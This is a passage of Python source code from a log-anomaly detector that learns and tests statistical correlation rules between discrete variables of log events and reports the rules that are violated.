self.rel_list[event_index][pos_var_cor_index][0][i_val] # At least two possible values, therefore delete the relation if 
self.rel_list[event_index][pos_var_cor_index][1][j_val] != {} and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Update the appearance of the relation if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 def init_cor_w_rel(self, event_index): """Initialize w_rel_list and runs init_single_cor_w_rel for the chosen indices.""" # Append the w_rel_list and w_rel_num_ll_to_vals if necessary if len(self.w_rel_list) < event_index+1: for _ in range(event_index + 1 - len(self.w_rel_list)): self.w_rel_list.append([]) self.w_rel_num_ll_to_vals.append([]) if len(self.w_rel_list[event_index]) == 0: for _ in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 self.w_rel_list[event_index].append([{}, {}]) self.w_rel_num_ll_to_vals[event_index].append([{}, {}]) # Only initialize the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 self.init_single_cor_w_rel(event_index, pos_var_cor_index) def init_single_cor_w_rel(self, event_index, pos_var_cor_index): """Initialize the first entries of w_rel_list.""" i = self.pos_var_cor[event_index][pos_var_cor_index][0] # Index of the first variable in discrete_indices j = self.pos_var_cor[event_index][pos_var_cor_index][1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the 
j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Updating both lists in w_rel_list[event_index][pos_var_cor_index] and w_rel_num_ll_to_vals[event_index][pos_var_cor_index] # Add an entry for i_val if necessary if i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] += 1 # Add an entry for j_val if necessary if j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] += 1 # Add the entries for j_val if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 # Add the entries for i_val if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Removes the entries of w_rel_list[event_index][pos_var_cor_index] which can not be considered possible correlations # Generate the list of entries in i, which should be deleted delete_i_vals = [i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if not( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values(), len( self.pos_var_val[event_index][j])))] # Delete entries of i for i_val in delete_i_vals: del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del 
self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] # Generate the list of entries in j, which should be deleted delete_j_vals = [j_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1] if not( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values(), len( self.pos_var_val[event_index][i])))] # Delete entries of j for j_val in delete_j_vals: del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] def update_or_test_cor(self, event_index): """Update or test the possible correlations and removes the false ones.""" for meth in self.used_cor_meth: if meth == 'Rel': self.update_or_test_cor_rel(event_index) elif meth == 'WRel': self.update_or_test_cor_w_rel(event_index) def update_or_test_cor_rel(self, event_index): """Update or test the rel_list.""" for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices if self.update_rules[event_index] and self.learn_mode: # Update both list in rel_list[event_index][pos_var_cor_index] and create new rules if self.generate_rules[event_index] # is True message = f'New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of the event' \ f' {self.event_type_detector.get_event_type(event_index)}' confidence = 0 total_correlations = len([None for _ in self.rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] value_changes = [] if self.generate_rules[event_index]: failed_i_vals = [] failed_j_vals = [] new_i_vals = [] new_j_vals = [] for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = 
self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously and appends the message to string or save the index in failed_i_vals # if the correlation was violated if i_val not in self.rel_list[event_index][pos_var_cor_index][0] and self.generate_rules[event_index]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 0} new_i_vals.append(i_val) elif i_val in self.rel_list[event_index][pos_var_cor_index][0] and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: if not self.generate_rules[event_index] or i_val not in new_i_vals: sorted_log_lines.append( # skipcq: PYL-C0209 'New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][0][i_val].keys())[0]), repr(j_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) change = {'OldValue': repr(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]), 'NewValue': repr(j_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][0][i_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and i_val not in failed_i_vals: failed_i_vals.append(i_val) # Check if j_val has not appeared previously and appends the message 
to string or save the index in failed_j_vals if # the correlation was violated if j_val not in self.rel_list[event_index][pos_var_cor_index][1] and self.generate_rules[event_index]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 0} new_j_vals.append(j_val) elif j_val in self.rel_list[event_index][pos_var_cor_index][1] and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: if not self.generate_rules[event_index] or j_val not in new_j_vals: sorted_log_lines.append( # skipcq: PYL-C0209 'New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][1][j_val].keys())[0]), repr(i_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) change = {'OldValue': repr(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]), 'NewValue': repr(i_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][1][j_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and j_val not in failed_j_vals: failed_j_vals.append(j_val) # Update the appearance of the relations if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ 
pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Print the message if at least one correlation was violated if len(sorted_log_lines) != 0: event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['ValueChanges'] = value_changes event_data['TypeInfo'] = {'Confidence': confidence} for listener in self.anomaly_event_handlers: sorted_log_lines += ['']*(self.event_type_detector.total_records - len(sorted_log_lines)) listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # Delete the rules which failed during the rule generation phase if self.generate_rules[event_index]: for i_val in failed_i_vals: if i_val in self.rel_list[event_index][pos_var_cor_index][0]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] for j_val in failed_j_vals: if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Only update the possible correlations which have been initialized and print warnings reported_values_ij = {} reported_values_ji = {} for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # A new value appeared, therefore append the new value to the list reported_values_ij if i_val in self.rel_list[event_index][pos_var_cor_index][0] and self.rel_list[event_index][pos_var_cor_index][0][ i_val] != {} and j_val not in self.rel_list[event_index][pos_var_cor_index][0][i_val]: if i_val not in reported_values_ij: reported_values_ij[i_val] 
= {j_val: 1} elif j_val in reported_values_ij[i_val]: reported_values_ij[i_val][j_val] += 1 else: reported_values_ij[i_val][j_val] = 1 # A new value appeared, therefore append the new value to the list reported_values_ji if j_val in self.rel_list[event_index][pos_var_cor_index][1] and self.rel_list[event_index][pos_var_cor_index][1][ j_val] != {} and i_val not in self.rel_list[event_index][pos_var_cor_index][1][j_val]: if j_val not in reported_values_ji: reported_values_ji[j_val] = {i_val: 1} elif i_val in reported_values_ji[j_val]: reported_values_ji[j_val][i_val] += 1 else: reported_values_ji[j_val][i_val] = 1 # Print the message of the reported values for i_val in reported_values_ij: # skipcq: PYL-C0209 message = 'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][pos_var_cor_val[ 1]]], list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[ 0], self.event_type_detector.total_records) confidence = (sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) / ( sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) + 1)) * ( len(reported_values_ij[i_val]) / (len(reported_values_ij[i_val]) + 1)) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_values.append(repr(i_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]) event_data['AffectedLogAtomPaths'] = 
list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # Print the message of the reported values for j_val in reported_values_ji: # skipcq: PYL-C0209 message = 'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][self.pos_var_cor[ event_index][pos_var_cor_index][0]]], list(self.rel_list[event_index][pos_var_cor_index][1][ j_val].keys())[0], self.event_type_detector.total_records) confidence = (sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) / ( sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) + 1)) * ( len(reported_values_ji[j_val]) / (len(reported_values_ji[j_val]) + 1)) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_values.append(repr(j_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]) event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines += [''] * 
(self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) def update_or_test_cor_w_rel(self, event_index): """Update or test the w_rel_list.""" # Initialise the lists for the BT results if necessary if len(self.w_rel_ht_results) < event_index + 1 or self.w_rel_ht_results[event_index] == []: self.w_rel_ht_results += [[] for i in range(event_index + 1 - len(self.w_rel_ht_results))] self.w_rel_ht_results[event_index] = [ [{i_val: [1] * self.num_bt for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [1]*self.num_bt for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] self.w_rel_confidences += [[] for i in range(event_index + 1 - len(self.w_rel_confidences))] self.w_rel_confidences[event_index] = [ [{i_val: [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [] for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Initialises the appearance list, as a copy of the w_rel_list with 0 instead of the CountIndices current_appearance_list = [ [{i_val: {j_val: 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]} for i_val in self.w_rel_list[ event_index][pos_var_cor_index][0]}, {j_val: {i_val: 0 for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][ j_val]} for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Counting the appearance of the cases in current_appearance_list for k in range(-1, -self.num_update-1, -1): # List of the values of discrete variables, in one log line vals = [self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] for i in range( 
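    def update_or_test_cor_w_rel(self, event_index):
        """
        Update or test the w_rel_list (correlation rules with a value distribution on the right-hand side) of one event type.

        Only the last num_update values of every discrete variable of the event type are counted into current_appearance_list,
        which mirrors w_rel_list[event_index] (per variable pair: [{i_val: {j_val: count}}, {j_val: {i_val: count}}]).
        Depending on generate_rules[event_index]:
        - rule generation: rules are created when check_cor_w_rel accepts the observed counts, extended when new right-hand
          values appear, tested with homogeneity_test otherwise, and deleted (print_failed_wrel_update) once the window of
          test results in w_rel_ht_results holds fewer than min_successes_bt successes (the "BT" in the comments);
        - otherwise the existing rules are tested and, if update_rules[event_index] and learn_mode are set, updated with the
          new counts, new right-hand values are reported through anomaly_event_handlers and failed rules are deleted; without
          update_rules/learn_mode the failed rules are only reported (print_failed_wrel_test) and their test window is reset.

        @param event_index index of the event type in event_type_detector, w_rel_list, pos_var_cor and the result lists.
        """
        # Initialise the lists for the BT results if necessary
        if len(self.w_rel_ht_results) < event_index + 1 or self.w_rel_ht_results[event_index] == []:
            self.w_rel_ht_results += [[] for i in range(event_index + 1 - len(self.w_rel_ht_results))]
            # One window of num_bt ones per rule; a 0 is shifted in for every failed test below.
            self.w_rel_ht_results[event_index] = [
                [{i_val: [1] * self.num_bt for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, {
                    j_val: [1]*self.num_bt for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range(
                    len(self.pos_var_cor[event_index]))]
            self.w_rel_confidences += [[] for i in range(event_index + 1 - len(self.w_rel_confidences))]
            # Per rule: the statistics of the most recent failed tests, appended by homogeneity_test and below.
            self.w_rel_confidences[event_index] = [
                [{i_val: [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, {
                    j_val: [] for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range(
                    len(self.pos_var_cor[event_index]))]

        # Initialises the appearance list, as a copy of the w_rel_list with 0 instead of the CountIndices
        current_appearance_list = [
            [{i_val: {j_val: 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]} for i_val in self.w_rel_list[
                event_index][pos_var_cor_index][0]}, {j_val: {i_val: 0 for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][
                    j_val]} for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range(
                len(self.pos_var_cor[event_index]))]

        # Counting the appearance of the cases in current_appearance_list (the last num_update values, newest first)
        for k in range(-1, -self.num_update-1, -1):
            # List of the values of discrete variables, in one log line
            vals = [self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] for i in range(
                len(self.discrete_indices[event_index]))]

            for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]):
                # Count the appearances if the list is not empty or if new rules should be generated
                if current_appearance_list[pos_var_cor_index] != [{}, {}] or self.generate_rules[event_index]:
                    i = pos_var_cor_val[0]  # Index of the first variable in discrete_indices
                    j = pos_var_cor_val[1]  # Index of the second variable in discrete_indices

                    # Add the appearance of the line to the appearance list and adds new entries if self.generate_rules[event_index]
                    # is set to True.
                    if vals[i] in current_appearance_list[pos_var_cor_index][0]:
                        if vals[j] in current_appearance_list[pos_var_cor_index][0][vals[i]]:
                            current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] += 1
                        else:
                            current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] = 1
                    elif self.generate_rules[event_index]:
                        current_appearance_list[pos_var_cor_index][0][vals[i]] = {vals[j]: 1}

                    if vals[j] in current_appearance_list[pos_var_cor_index][1]:
                        if vals[i] in current_appearance_list[pos_var_cor_index][1][vals[j]]:
                            current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] += 1
                        else:
                            current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] = 1
                    elif self.generate_rules[event_index]:
                        current_appearance_list[pos_var_cor_index][1][vals[j]] = {vals[i]: 1}

        if self.generate_rules[event_index]:
            # generates new rules or appends new values to existing rules
            for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]):
                # Only consider the possible correlations which have been initialized
                if current_appearance_list[pos_var_cor_index] != [{}, {}]:
                    # Indices of the two variables of this pair in discrete_indices. They select the number of possible values
                    # (pos_var_val) handed to check_cor_w_rel; previously the i and j left over from the last iteration of the
                    # counting loop above were used for every pair.
                    i = pos_var_cor_val[0]
                    j = pos_var_cor_val[1]

                    # Check correlations i=i_val -> j=j_val and decide if the rules should be deleted, extended or updated,
                    # or if new rules should be generated
                    for i_val in current_appearance_list[pos_var_cor_index][0]:
                        if i_val in self.w_rel_list[event_index][pos_var_cor_index][0]:
                            # Check if new values have appeared, append them and reinitialize the lists
                            tmp_bool = False
                            for j_val in current_appearance_list[pos_var_cor_index][0][i_val]:
                                if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]:
                                    tmp_bool = True
                                    break

                            # New values have appeared on the right side
                            if tmp_bool:
                                if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[
                                        event_index][j])):
                                    # Add new rules
                                    self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {}
                                    self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[
                                        pos_var_cor_index][0][i_val].values())
                                    # Add the entries for j_val
                                    for j_val in current_appearance_list[pos_var_cor_index][0][i_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[
                                            pos_var_cor_index][0][i_val][j_val]
                                else:
                                    # Count the rejected extension as a failed test of the rule
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][0][i_val][1:] + [0]
                                    self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val].append(
                                        0.5 + 1 / len(current_appearance_list[pos_var_cor_index][0][i_val]))
                                    self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[
                                        event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):]
                                    if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt:  # BT
                                        self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val)
                                        del self.w_rel_list[event_index][pos_var_cor_index][0][i_val]
                                        del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]

                            # No new values have appeared on the right side. Update the appearance of the relation
                            else:
                                # Check correlations i=i_val -> j=j_val
                                # States True after the following steps if all tests were positive, and False if at least one was negative
                                tmp_bool = True
                                if any(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[
                                        pos_var_cor_index][0][i_val]):
                                    tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val],
                                                                     current_appearance_list[pos_var_cor_index][0][i_val],
                                                                     event_index, pos_var_cor_index, 0, i_val)

                                # Update the bt_results list
                                if tmp_bool:
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][0][i_val][1:] + [1]
                                    for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[
                                            pos_var_cor_index][0][i_val][j_val]
                                else:
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][0][i_val][1:] + [0]
                                    if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt:  # BT
                                        self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val)
                                        del self.w_rel_list[event_index][pos_var_cor_index][0][i_val]
                                        del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]

                        # i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]. Therefore, test if the rule should be used
                        else:
                            if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[
                                    event_index][j])):
                                self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {}
                                self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[
                                    pos_var_cor_index][0][i_val].values())
                                self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt
                                self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = []
                                # Add the entries for j_val
                                for j_val in current_appearance_list[pos_var_cor_index][0][i_val]:
                                    self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[
                                        pos_var_cor_index][0][i_val][j_val]

                    # Check correlations j=j_val -> i=i_val and decide if the rules should be deleted, extended or updated,
                    # or if new rules should be generated.
                    for j_val in current_appearance_list[pos_var_cor_index][1]:
                        if j_val in self.w_rel_list[event_index][pos_var_cor_index][1]:
                            # Check if new values have appeared, append them and reinitialize the lists
                            tmp_bool = False
                            for i_val in current_appearance_list[pos_var_cor_index][1][j_val]:
                                if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]:
                                    tmp_bool = True
                                    break

                            # New values have appeared on the right side
                            if tmp_bool:
                                if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[
                                        event_index][i])):
                                    # Add new rules
                                    self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {}
                                    self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[
                                        pos_var_cor_index][1][j_val].values())
                                    # Add the entries for i_val
                                    for i_val in current_appearance_list[pos_var_cor_index][1][j_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[
                                            pos_var_cor_index][1][j_val][i_val]
                                else:
                                    # Count the rejected extension as a failed test of the rule
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][1][j_val][1:] + [0]
                                    self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val].append(
                                        0.5 + 1 / len(current_appearance_list[pos_var_cor_index][1][j_val]))
                                    # Trim the confidences of this j=j_val rule (previously the i=i_val list of the loop variable
                                    # i_val was trimmed here, which belongs to the other direction and need not exist).
                                    self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = self.w_rel_confidences[
                                        event_index][pos_var_cor_index][1][j_val][-(self.num_bt-self.min_successes_bt+1):]
                                    if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt:  # BT
                                        self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val)
                                        del self.w_rel_list[event_index][pos_var_cor_index][1][j_val]
                                        del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]

                            # No new values have appeared on the right side. Update the appearance of the relation
                            else:
                                # Check correlations j=j_val -> i=i_val
                                # States True after the following steps if all tests were positive, and False if at least one was negative
                                tmp_bool = True
                                if any(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[
                                        pos_var_cor_index][1][j_val]):
                                    tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val],
                                                                     current_appearance_list[pos_var_cor_index][1][j_val],
                                                                     event_index, pos_var_cor_index, 1, j_val)

                                # Update the bt_results list
                                if tmp_bool:
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][1][j_val][1:] + [1]
                                    for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]:
                                        self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[
                                            pos_var_cor_index][1][j_val][i_val]
                                else:
                                    self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][
                                        pos_var_cor_index][1][j_val][1:] + [0]
                                    if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt:  # BT
                                        self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val)
                                        del self.w_rel_list[event_index][pos_var_cor_index][1][j_val]
                                        del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]

                        # j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]. Therefore, test if the rule should be used
                        else:
                            if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[
                                    event_index][i])):
                                self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {}
                                self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[
                                    pos_var_cor_index][1][j_val].values())
                                self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt
                                self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = []
                                # Add the entries for i_val
                                for i_val in current_appearance_list[pos_var_cor_index][1][j_val]:
                                    self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[
                                        pos_var_cor_index][1][j_val][i_val]

        else:
            # Tests and updates the correlation rules
            for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]):
                # Only consider the possible correlations which have been initialized
                if self.w_rel_list[event_index][pos_var_cor_index] != [{}, {}]:
                    # Initialise the lists for the indices that failed the binomial test
                    failed_i_vals = []
                    failed_j_vals = []

                    # Check correlations i=i_val -> j=j_val
                    for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]:
                        # States True after the following steps if all tests were positive, and False if at least one was negative.
                        tmp_bool = True
                        # Only test rules with enough observations in the current window
                        if sum(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[
                                pos_var_cor_index][0][i_val]) > self.min_values_cors_thres:
                            tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val],
                                                             current_appearance_list[pos_var_cor_index][0][i_val],
                                                             event_index, pos_var_cor_index, 0, i_val)

                        # Update the bt_results list
                        if tmp_bool:
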